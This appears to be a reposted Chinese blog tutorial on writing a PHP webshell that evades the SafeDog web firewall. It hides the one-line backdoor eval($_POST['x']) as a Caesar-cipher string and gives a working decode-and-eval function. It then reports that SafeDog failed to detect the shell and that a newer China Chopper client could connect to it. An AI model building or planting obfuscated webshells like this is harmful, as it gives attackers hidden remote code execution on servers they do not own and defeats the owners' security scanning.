PHP过狗webshell编写过程

0x1 先上图:

PHP过狗webshell编写过程

0x2 编写过程

这里必须强调一下我内心的感觉,小阔爱前两天也研究了过狗的一句话了,然后我突然觉得大家都在进步,我研究点啥呢?不如也试试以前因为觉得自己不懂代码,而不会研究的免杀shell吧。

很多人都在说过狗的方法,大致总结一下就是:函数封包,函数回调等。

我这里用到的一个方法就是编码,当然不是普通的base64编码了,是自己写了一个凯撒密码解密的函数,将eval($_POST['x']);转码为凯撒密文$arr="j{fq-)dUTXY}b.@"; ,存放到$str变量中。

然后写函数解码:

function tony($arr){
for($i=0;$i< strlen($arr);$i++){
$arr[$i]=chr(ord($arr[$i])-5);
}
return $arr;
}

我的凯撒密码采用按ascii码进行向ascii增大的方向移动5位得到的密文,所以向ascii减小的方向移动5位来解码。

然后再用eval执行以下tony函数解密的$arr即可。

完整代码:

如图:

PHP过狗webshell编写过程

执行成功,我们用安全狗扫描一下:

PHP过狗webshell编写过程

OK,安全狗没有扫描到。

那么我们来用菜刀链接一下:

PHP过狗webshell编写过程

又出了情况,旧版菜刀链接被防火墙拦截,我问了下接地气,这个原因出在菜刀提交的数据被防火墙拦截了,让我去测试一下菜刀2016版的,测试结果:

PHP过狗webshell编写过程

可以连接上。

 

本文转载自:http://www.admintony.top/?p=1062

原文地址:https://www.cnblogs.com/xishaonian/p/6001800.html